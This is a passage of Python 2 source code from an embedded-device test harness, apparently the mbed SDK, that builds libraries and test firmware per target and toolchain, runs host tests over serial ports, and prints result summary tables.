clean_mbed_libs_options = True if self.opts_goanna_for_mbed_sdk or clean or self.opts_clean else None
try:
build_mbed_libs_result = build_mbed_libs(T,
toolchain,
options=build_mbed_libs_options,
clean=clean_mbed_libs_options,
verbose=self.opts_verbose,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties)
if not build_mbed_libs_result:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Toolchain %s is not yet supported for this target'% (T.name, toolchain))
continue
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building MBED libs for %s using %s'% (target, toolchain))
continue
build_dir = join(BUILD_DIR, "test", target, toolchain)
test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
test_suite_properties['build_dir'] = build_dir
test_suite_properties['skipped'] = []
# Enumerate through all tests and shuffle test order if requested
test_map_keys = sorted(TEST_MAP.keys())
if self.opts_shuffle_test_order:
random.shuffle(test_map_keys, self.shuffle_random_func)
# Update database with shuffle seed if applicable
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _shuffle_seed=self.shuffle_random_func())
self.db_logger.disconnect();
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
# Update MUTs and Test Specification in database
self.db_logger.update_build_id_info(self.db_logger_build_id, _muts=self.muts, _test_spec=self.test_spec)
# Update Extra information in database (some options passed to test suite)
self.db_logger.update_build_id_info(self.db_logger_build_id, _extra=json.dumps(self.dump_options()))
self.db_logger.disconnect();
valid_test_map_keys = self.get_valid_tests(test_map_keys, target, toolchain, test_ids)
skipped_test_map_keys = self.get_skipped_tests(test_map_keys, valid_test_map_keys)
for skipped_test_id in skipped_test_map_keys:
test_suite_properties['skipped'].append(skipped_test_id)
# First pass through all tests and determine which libraries need to be built
libraries = []
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
# Detect which lib should be added to test
# Some libs have to be compiled, like RTOS or ETH
for lib in LIBRARIES:
if lib['build_dir'] in test.dependencies and lib['id'] not in libraries:
libraries.append(lib['id'])
build_project_options = ["analyze"] if self.opts_goanna_for_tests else None
clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None
# Build all required libraries
for lib_id in libraries:
try:
build_lib(lib_id,
T,
toolchain,
options=build_project_options,
verbose=self.opts_verbose,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties)
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building library %s'% (lib_id))
continue
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)
# TODO: move these 2 loops below to a separate function
INC_DIRS = []
for lib_id in libraries:
if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])
MACROS = []
for lib_id in libraries:
if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
test_uuid = uuid.uuid4()
MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))
# Prepare extended test results data structure (it can be used to generate detailed test report)
if target not in self.test_summary_ext:
self.test_summary_ext[target] = {} # test_summary_ext : toolchain
if toolchain not in self.test_summary_ext[target]:
self.test_summary_ext[target][toolchain] = {} # test_summary_ext : toolchain : target
tt_test_id = "%s::%s::%s" % (toolchain, target, test_id) # For logging only
project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
try:
path = build_project(test.source_dir,
join(build_dir, test_id),
T,
toolchain,
test.dependencies,
options=build_project_options,
clean=clean_project_options,
verbose=self.opts_verbose,
name=project_name,
macros=MACROS,
inc_dirs=INC_DIRS,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
project_id=test_id,
project_description=test.get_description())
except ToolException:
project_name_str = project_name if project_name is not None else test_id
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building project %s'% (project_name_str))
# Append test results to global test summary
self.test_summary.append(
(self.TEST_RESULT_BUILD_FAILED, target, toolchain, test_id, 'Toolchain build failed', 0, 0, '-')
)
# Add detailed test result to test summary structure
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
self.test_summary_ext[target][toolchain][test_id].append({ 0: {
'result' : self.TEST_RESULT_BUILD_FAILED,
'output' : '',
'target_name' : target,
'target_name_unique': target,
'toolchain_name' : toolchain,
'id' : test_id,
'description' : 'Toolchain build failed',
'elapsed_time' : 0,
'duration' : 0,
'copy_method' : None
}})
continue
if self.opts_only_build_tests:
# With this option we are skipping testing phase
continue
# Test duration can be increased by global value
test_duration = test.duration
if self.opts_extend_test_timeout is not None:
test_duration += self.opts_extend_test_timeout
# For an automated test the duration acts as a timeout after
# which the test gets interrupted
test_spec = self.shape_test_request(target, path, test_id, test_duration)
test_loops = self.get_test_loop_count(test_id)
test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path
# read MUTs, test specification and perform tests
handle_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)
if handle_results is None:
continue
for handle_result in handle_results:
if handle_result:
single_test_result, detailed_test_results = handle_result
else:
continue
# Append test results to global test summary
if single_test_result is not None:
self.test_summary.append(single_test_result)
# Add detailed test result to test summary structure
if target not in self.test_summary_ext[target][toolchain]:
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
append_test_result = detailed_test_results
# If waterfall and consolidate-waterfall options are enabled,
# only include the last test result in the report.
if self.opts_waterfall_test and self.opts_consolidate_waterfall_test:
append_test_result = {0: detailed_test_results[len(detailed_test_results) - 1]}
self.test_summary_ext[target][toolchain][test_id].append(append_test_result)
test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
self.test_suite_properties_ext[target][toolchain] = test_suite_properties
q.put(target + '_'.join(toolchains))
return
def execute(self):
clean = self.test_spec.get('clean', False)
test_ids = self.test_spec.get('test_ids', [])
q = Queue()
# Generate seed for shuffle if seed is not provided in command-line options
self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)
build_report = {}
build_properties = {}
if self.opts_parallel_test_exec:
###################################################################
# Experimental, parallel test execution per singletest instance.
###################################################################
execute_threads = [] # Threads used to build mbed SDK, libs, test cases and execute tests
# Note: We are building here in parallel for each target separately!
# So we are not building the same thing multiple times and compilers
# in separate threads do not collide.
# Inside the execute_thread_slice() function, handle() will be called to
# get information about available MUTs (per target).
for target, toolchains in self.test_spec['targets'].iteritems():
self.test_suite_properties_ext[target] = {}
t = threading.Thread(target=self.execute_thread_slice, args = (q, target, toolchains, clean, test_ids, build_report, build_properties))
t.daemon = True
t.start()
execute_threads.append(t)
for t in execute_threads:
q.get() # t.join() would block some threads because we should not wait in any order for thread end
else:
# Serialized (not parallel) test execution
for target, toolchains in self.test_spec['targets'].iteritems():
if target not in self.test_suite_properties_ext:
self.test_suite_properties_ext[target] = {}
self.execute_thread_slice(q, target, toolchains, clean, test_ids, build_report, build_properties)
q.get()
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _status_fk=self.db_logger.BUILD_ID_STATUS_COMPLETED)
self.db_logger.disconnect();
return self.test_summary, self.shuffle_random_seed, self.test_summary_ext, self.test_suite_properties_ext, build_report, build_properties
def get_valid_tests(self, test_map_keys, target, toolchain, test_ids):
valid_test_map_keys = []
for test_id in test_map_keys:
test = TEST_MAP[test_id]
if self.opts_test_by_names and test_id not in self.opts_test_by_names.split(','):
continue
if test_ids and test_id not in test_ids:
continue
if self.opts_test_only_peripheral and not test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
continue
if self.opts_peripheral_by_names and test.peripherals and not len([i for i in test.peripherals if i in self.opts_peripheral_by_names.split(',')]):
# We will skip tests not forced with -p option
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
continue
if self.opts_test_only_common and test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral test skipped for target %s'% (target))
continue
if test.automated and test.is_supported(target, toolchain):
if test.peripherals is None and self.opts_only_build_tests:
# When users are using the 'build only' flag and tests do not have
# specified peripherals, we can allow test building by default
pass
elif self.opts_peripheral_by_names and test_id not in self.opts_peripheral_by_names.split(','):
# If we force peripheral with option -p we expect test
# to pass even if peripheral is not in MUTs file.
pass
elif not self.is_peripherals_available(target, test.peripherals):
if self.opts_verbose_skipped_tests:
if test.peripherals:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral %s test skipped for target %s'% (",".join(test.peripherals), target))
else:
print self.logger.log_line(self.logger.LogType.INFO, 'Test %s skipped for target %s'% (test_id, target))
continue
# The test has made it through all the filters, so add it to the valid tests list
valid_test_map_keys.append(test_id)
return valid_test_map_keys
def get_skipped_tests(self, all_test_map_keys, valid_test_map_keys):
# NOTE: This will not preserve order
return list(set(all_test_map_keys) - set(valid_test_map_keys))
def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows test x toolchain test result matrix
"""
RESULT_INDEX = 0
TARGET_INDEX = 1
TOOLCHAIN_INDEX = 2
TEST_INDEX = 3
DESC_INDEX = 4
unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)
result = "Test summary:\n"
for target in unique_targets:
result_dict = {} # test : { toolchain : result }
unique_target_toolchains = []
for test in test_summary:
if test[TARGET_INDEX] == target:
if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
if test[TEST_INDEX] not in result_dict:
result_dict[test[TEST_INDEX]] = {}
result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]
pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
pt.padding_width = 1 # One space between column edges and contents (default)
for test in unique_tests:
if test in result_dict:
test_results = result_dict[test]
if test in unique_test_desc:
row = [target, test, unique_test_desc[test]]
for toolchain in unique_toolchains:
if toolchain in test_results:
row.append(test_results[toolchain])
pt.add_row(row)
result += pt.get_string()
shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def generate_test_summary(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows target x test results matrix across
"""
        success_code = 0    # Success code that can later be returned to the environment
result = "Test summary:\n"
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time (sec)", "Timeout (sec)", "Loops"])
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {self.TEST_RESULT_OK : 0,
self.TEST_RESULT_FAIL : 0,
self.TEST_RESULT_ERROR : 0,
self.TEST_RESULT_UNDEF : 0,
self.TEST_RESULT_IOERR_COPY : 0,
self.TEST_RESULT_IOERR_DISK : 0,
self.TEST_RESULT_IOERR_SERIAL : 0,
self.TEST_RESULT_NO_IMAGE : 0,
self.TEST_RESULT_TIMEOUT : 0,
self.TEST_RESULT_MBED_ASSERT : 0,
self.TEST_RESULT_BUILD_FAILED : 0
}
for test in test_summary:
if test[0] in result_dict:
result_dict[test[0]] += 1
pt.add_row(test)
result += pt.get_string()
result += "\n"
        # Print only the non-zero result counters, e.g. "Result: 10 OK / 2 FAIL"
        non_zero_results = dict((k, v) for k, v in result_dict.iteritems() if v != 0)
        result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in non_zero_results.iteritems()])
shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str.split(',')
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
                    except ValueError:   # Skip entries whose loop count is not an integer
continue
result[_test_id] = _test_loops
return result
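    # Illustrative sketch (not part of the original code): assuming a --loops value such as
    # 'MBED_1=5,MBED_2=2', test_loop_list_to_dict would return {'MBED_1': 5, 'MBED_2': 2};
    # malformed entries (e.g. 'MBED_3=x') are skipped because int() raises ValueError.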
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
        result_msg = ""
        try:
            os.remove(file_path)
        except Exception, e:
            result_msg = e
            result = False
        return result, result_msg
def handle_mut(self, mut, data, target_name, toolchain_name, test_loops=1):
""" Test is being invoked for given MUT.
"""
# Get test information, image and test timeout
test_id = data['test_id']
test = TEST_MAP[test_id]
test_description = TEST_MAP[test_id].get_description()
image = data["image"]
duration = data.get("duration", 10)
if mut is None:
print "Error: No Mbed available: MUT[%s]" % data['mcu']
return None
mcu = mut['mcu']
copy_method = mut.get('copy_method') # Available board configuration selection e.g. core selection etc.
if self.db_logger:
self.db_logger.reconnect()
selected_copy_method = self.opts_copy_method if copy_method is None else copy_method
# Tests can be looped so test results must be stored for the same test
test_all_result = []
# Test results for one test ran few times
detailed_test_results = {} # { Loop_number: { results ... } }
for test_index in range(test_loops):
            # If mbedls is available and we are auto-detecting MUT info,
            # update the MUT info (the mount point may have changed)
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
platform_name_filter = [mcu]
muts_list = {}
found = False
for i in range(0, 60):
print('Looking for %s with MBEDLS' % mcu)
muts_list = get_autodetected_MUTS_list(platform_name_filter=platform_name_filter)
if 1 not in muts_list:
sleep(3)
else:
found = True
break
if not found:
print "Error: mbed not found with MBEDLS: %s" % data['mcu']
return None
else:
mut = muts_list[1]
disk = mut.get('disk')
port = mut.get('port')
if disk is None or port is None:
return None
target_by_mcu = TARGET_MAP[mut['mcu']]
target_name_unique = mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu']
# Some extra stuff can be declared in MUTs structure
reset_type = mut.get('reset_type') # reboot.txt, reset.txt, shutdown.txt
reset_tout = mut.get('reset_tout') # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)
# When the build and test system were separate, this was relative to a
# base network folder base path: join(NETWORK_BASE_PATH, )
image_path = image
# Host test execution
start_host_exec_time = time()
single_test_result = self.TEST_RESULT_UNDEF # single test run result
_copy_method = selected_copy_method
if not exists(image_path):
                single_test_result = self.TEST_RESULT_NO_IMAGE
                elapsed_time = 0
                single_testduration = 0       # Avoid a NameError below when the image is missing
                single_timeout = duration     # Report the requested duration as the timeout
single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
print single_test_output
else:
# Host test execution
start_host_exec_time = time()
host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
host_test_result = self.run_host_test(test.host_test,
image_path, disk, port, duration,
micro=target_name,
verbose=host_test_verbose,
reset=host_test_reset,
reset_tout=reset_tout,
copy_method=selected_copy_method,
program_cycle_s=target_by_mcu.program_cycle_s())
single_test_result, single_test_output, single_testduration, single_timeout = host_test_result
# Store test result
test_all_result.append(single_test_result)
total_elapsed_time = time() - start_host_exec_time # Test time with copy (flashing) / reset
            elapsed_time = single_testduration  # Time of the single test case execution after reset
detailed_test_results[test_index] = {
'result' : single_test_result,
'output' : single_test_output,
'target_name' : target_name,
'target_name_unique' : target_name_unique,
'toolchain_name' : toolchain_name,
'id' : test_id,
'description' : test_description,
'elapsed_time' : round(elapsed_time, 2),
'duration' : single_timeout,
'copy_method' : _copy_method,
}
print self.print_test_result(single_test_result, target_name_unique, toolchain_name,
test_id, test_description, elapsed_time, single_timeout)
# Update database entries for ongoing test
if self.db_logger and self.db_logger.is_connected():
test_type = 'SingleTest'
self.db_logger.insert_test_entry(self.db_logger_build_id,
target_name,
toolchain_name,
test_type,
test_id,
single_test_result,
single_test_output,
elapsed_time,
single_timeout,
test_index)
# If we perform waterfall test we test until we get OK and we stop testing
if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
break
if self.db_logger:
self.db_logger.disconnect()
return (self.shape_global_test_loop_result(test_all_result, self.opts_waterfall_test and self.opts_consolidate_waterfall_test),
target_name_unique,
toolchain_name,
test_id,
test_description,
round(elapsed_time, 2),
single_timeout,
self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target.
"""
handle_results = []
data = json.loads(test_spec)
# Find a suitable MUT:
mut = None
for id, m in self.muts.iteritems():
if m['mcu'] == data['mcu']:
mut = m
handle_result = self.handle_mut(mut, data, target_name, toolchain_name, test_loops=test_loops)
handle_results.append(handle_result)
return handle_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result, waterfall_and_consolidate):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
elif waterfall_and_consolidate and any(res == self.TEST_RESULT_OK for res in test_all_result):
result = self.TEST_RESULT_OK
return result
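    # Illustrative sketch (not part of the original code): given looped results
    # ['OK', 'FAIL', 'OK'], shape_global_test_loop_result returns 'FAIL' by default, but
    # 'OK' when waterfall_and_consolidate is True because at least one loop passed;
    # shape_test_loop_ok_result_count would report the same list as '2/3'.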
def run_host_test(self, name, image_path, disk, port, duration,
micro=None, reset=None, reset_tout=None,
verbose=False, copy_method=None, program_cycle_s=None):
""" Function creates new process with host test configured with particular test case.
            Function is also polling the serial port activity from the process to catch all data
printed by test runner and host test during test execution
"""
def get_char_from_queue(obs):
""" Get character from queue safe way
"""
try:
c = obs.queue.get(block=True, timeout=0.5)
except Empty, _:
c = None
return c
def filter_queue_char(c):
""" Filters out non ASCII characters from serial port
"""
if ord(c) not in range(128):
c = ' '
return c
def get_test_result(output):
""" Parse test 'output' data
"""
result = self.TEST_RESULT_TIMEOUT
for line in "".join(output).splitlines():
search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
if search_result and len(search_result.groups()):
result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
break
return result
def get_auto_property_value(property_name, line):
""" Scans auto detection line from MUT and returns scanned parameter 'property_name'
Returns string
"""
result = None
if re.search("HOST: Property '%s'"% property_name, line) is not None:
property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
if property is not None and len(property.groups()) == 1:
result = property.groups()[0]
return result
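        # Illustrative sketch (not part of the original code): a MUT line such as
        # "HOST: Property 'timeout' = '20'" would make get_auto_property_value('timeout', line)
        # return the string '20', which the loop below converts with int() to update the test duration.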
# print "{%s} port:%s disk:%s" % (name, port, disk),
cmd = ["python",
'%s.py'% name,
'-d', disk,
'-f', '"%s"'% image_path,
'-p', port,
'-t', str(duration),
'-C', str(program_cycle_s)]
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
cmd += ['--auto']
# Add extra parameters to host_test
if copy_method is not None:
cmd += ["-c", copy_method]
if micro is not None:
cmd += ["-m", micro]
if reset is not None:
cmd += ["-r", reset]
if reset_tout is not None:
cmd += ["-R", str(reset_tout)]
if verbose:
print Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET
print "Test::Output::Start"
proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
obs = ProcessObserver(proc)
update_once_flag = {} # Stores flags checking if some auto-parameter was already set
line = ''
output = []
start_time = time()
while (time() - start_time) < (2 * duration):
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
# Give the mbed under test a way to communicate the end of the test
if c in ['\n', '\r']:
# Checking for auto-detection information from the test about MUT reset moment
if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
# We will update this marker only once to prevent multiple time resets
update_once_flag['reset_target'] = True
start_time = time()
# Checking for auto-detection information from the test about timeout
auto_timeout_val = get_auto_property_value('timeout', line)
if 'timeout' not in update_once_flag and auto_timeout_val is not None:
                        # We will update this marker only once to prevent repeated timeout updates
update_once_flag['timeout'] = True
duration = int(auto_timeout_val)
# Detect mbed assert:
if 'mbed assertation failed: ' in line:
output.append('{{mbed_assert}}')
break
# Check for test end
if '{end}' in line:
break
line = ''
else:
line += c
end_time = time()
testcase_duration = end_time - start_time # Test case duration from reset to {end}
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
if verbose:
print "Test::Output::Finish"
# Stop test process
obs.stop()
result = get_test_result(output)
return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case defined in MUTs file
"""
if peripherals is not None:
peripherals = set(peripherals)
for id, mut in self.muts.iteritems():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JSON structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
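    # Illustrative sketch (not part of the original code): shape_test_request('LPC1768',
    # './build/test.bin', 'MBED_A1', duration=20) returns the JSON string
    # '{"mcu": "LPC1768", "image": "./build/test.bin", "duration": 20, "test_id": "MBED_A1"}'
    # (key order may differ), which handle() later parses back with json.loads().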
def get_unique_value_from_summary(test_summary, index):
""" Gets list of unique target names
"""
result = []
for test in test_summary:
target_name = test[index]
if target_name not in result:
result.append(target_name)
return sorted(result)
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
""" Gets list of unique target names and return dictionary
"""
result = {}
for test in test_summary:
key = test[index_key]
val = test[index_val]
if key not in result:
result[key] = val
return result
def show_json_file_format_error(json_spec_filename, line, column):
""" Prints JSON broken content
"""
with open(json_spec_filename) as data_file:
line_no = 1
for json_line in data_file:
if line_no + 5 >= line: # Print last few lines before error
print 'Line %d:\t'%line_no + json_line, # Prints line
if line_no == line:
print ' ' * len('Line %d:'%line_no) + '\t', '-' * (column-1) + '^'
break
line_no += 1
def json_format_error_defect_pos(json_error_msg):
""" Gets first error line and column in JSON file format.
Parsed from exception thrown by json.loads() string
"""
result = None
line, column = 0, 0
# Line value search
line_search = re.search('line [0-9]+', json_error_msg)
if line_search is not None:
ls = line_search.group().split(' ')
if len(ls) == 2:
line = int(ls[1])
# Column position search
column_search = re.search('column [0-9]+', json_error_msg)
if column_search is not None:
cs = column_search.group().split(' ')
if len(cs) == 2:
column = int(cs[1])
result = [line, column]
return result
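# Illustrative sketch (not part of the original code): for a typical json.loads() error
# message such as "Expecting ',' delimiter: line 7 column 12 (char 81)",
# json_format_error_defect_pos returns [7, 12], which show_json_file_format_error uses
# to print the offending line with a '^' marker under the broken column.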
def get_json_data_from_file(json_spec_filename, verbose=False):
""" Loads from file JSON formatted string to data structure
"""
result = None
try:
with open(json_spec_filename) as data_file:
try:
result = json.load(data_file)
except ValueError as json_error_msg:
result = None
print 'JSON file %s parsing failed. Reason: %s' % (json_spec_filename, json_error_msg)
# We can print where error occurred inside JSON file if we can parse exception msg
json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
if json_format_defect_pos is not None:
line = json_format_defect_pos[0]
column = json_format_defect_pos[1]
print
show_json_file_format_error(json_spec_filename, line, column)
except IOError as fileopen_error_msg:
print 'JSON file %s not opened. Reason: %s'% (json_spec_filename, fileopen_error_msg)
print
if verbose and result:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(result)
return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
""" Prints MUTs configuration passed to test script for verboseness
"""
muts_info_cols = []
# We need to check all unique properties for each defined MUT
for k in json_data:
mut_info = json_data[k]
for mut_property in mut_info:
if mut_property not in muts_info_cols:
muts_info_cols.append(mut_property)
# Prepare pretty table object to display all MUTs
pt_cols = ["index"] + muts_info_cols
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# Add rows to pretty print object
for k in json_data:
row = [k]
mut_info = json_data[k]
add_row = True
if platform_filter and 'mcu' in mut_info:
add_row = re.search(platform_filter, mut_info['mcu']) is not None
if add_row:
for col in muts_info_cols:
cell_val = mut_info[col] if col in mut_info else None
if type(cell_val) == ListType:
cell_val = join_delim.join(cell_val)
row.append(cell_val)
pt.add_row(row)
return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
""" Prints test specification configuration passed to test script for verboseness
"""
toolchains_info_cols = []
# We need to check all toolchains for each device
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
toolchains = targets[target]
for toolchain in toolchains:
if toolchain not in toolchains_info_cols:
toolchains_info_cols.append(toolchain)
# Prepare pretty table object to display test specification
pt_cols = ["mcu"] + sorted(toolchains_info_cols)
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# { target : [conflicted toolchains] }
toolchain_conflicts = {}
toolchain_path_conflicts = []
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
target_supported_toolchains = get_target_supported_toolchains(target)
if not target_supported_toolchains:
target_supported_toolchains = []
target_name = target if target in TARGET_MAP else "%s*"% target
row = [target_name]
toolchains = targets[target]
for toolchain in sorted(toolchains_info_cols):
# Check for conflicts: target vs toolchain
conflict = False
conflict_path = False
if toolchain in toolchains:
if toolchain not in target_supported_toolchains:
conflict = True
if target not in toolchain_conflicts:
toolchain_conflicts[target] = []
toolchain_conflicts[target].append(toolchain)
# Add marker inside table about target usage / conflict
cell_val = 'Yes' if toolchain in toolchains else '-'
if conflict:
cell_val += '*'
# Check for conflicts: toolchain vs toolchain path
if toolchain in TOOLCHAIN_BIN_PATH:
toolchain_path = TOOLCHAIN_BIN_PATH[toolchain]
if not os.path.isdir(toolchain_path):
conflict_path = True
if toolchain not in toolchain_path_conflicts:
toolchain_path_conflicts.append(toolchain)
if conflict_path:
cell_val += '#'
row.append(cell_val)
pt.add_row(row)
# generate result string
result = pt.get_string() # Test specification table
if toolchain_conflicts or toolchain_path_conflicts:
result += "\n"
result += "Toolchain conflicts:\n"
for target in toolchain_conflicts:
if target not in TARGET_MAP:
result += "\t* Target %s unknown\n"% (target)
conflict_target_list = join_delim.join(toolchain_conflicts[target])
            suffix = 's' if len(toolchain_conflicts[target]) > 1 else ''
            result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, suffix)
for toolchain in toolchain_path_conflicts:
# Let's check toolchain configuration
if toolchain in TOOLCHAIN_BIN_PATH:
toolchain_path = TOOLCHAIN_BIN_PATH[toolchain]
if not os.path.isdir(toolchain_path):
result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',',platform_filter=None):
""" Generates table summary with all test cases and additional test cases
information using pretty print functionality. Allows test suite user to
see test cases
"""
# get all unique test ID prefixes
unique_test_id = []
for test in TESTS:
split = test['id'].split('_')[:-1]
test_id_prefix = '_'.join(split)
if test_id_prefix not in unique_test_id:
unique_test_id.append(test_id_prefix)
unique_test_id.sort()
counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)
test_properties = ['id',
'automated',
'description',
'peripherals',
'host_test',
'duration'] if cols is None else cols
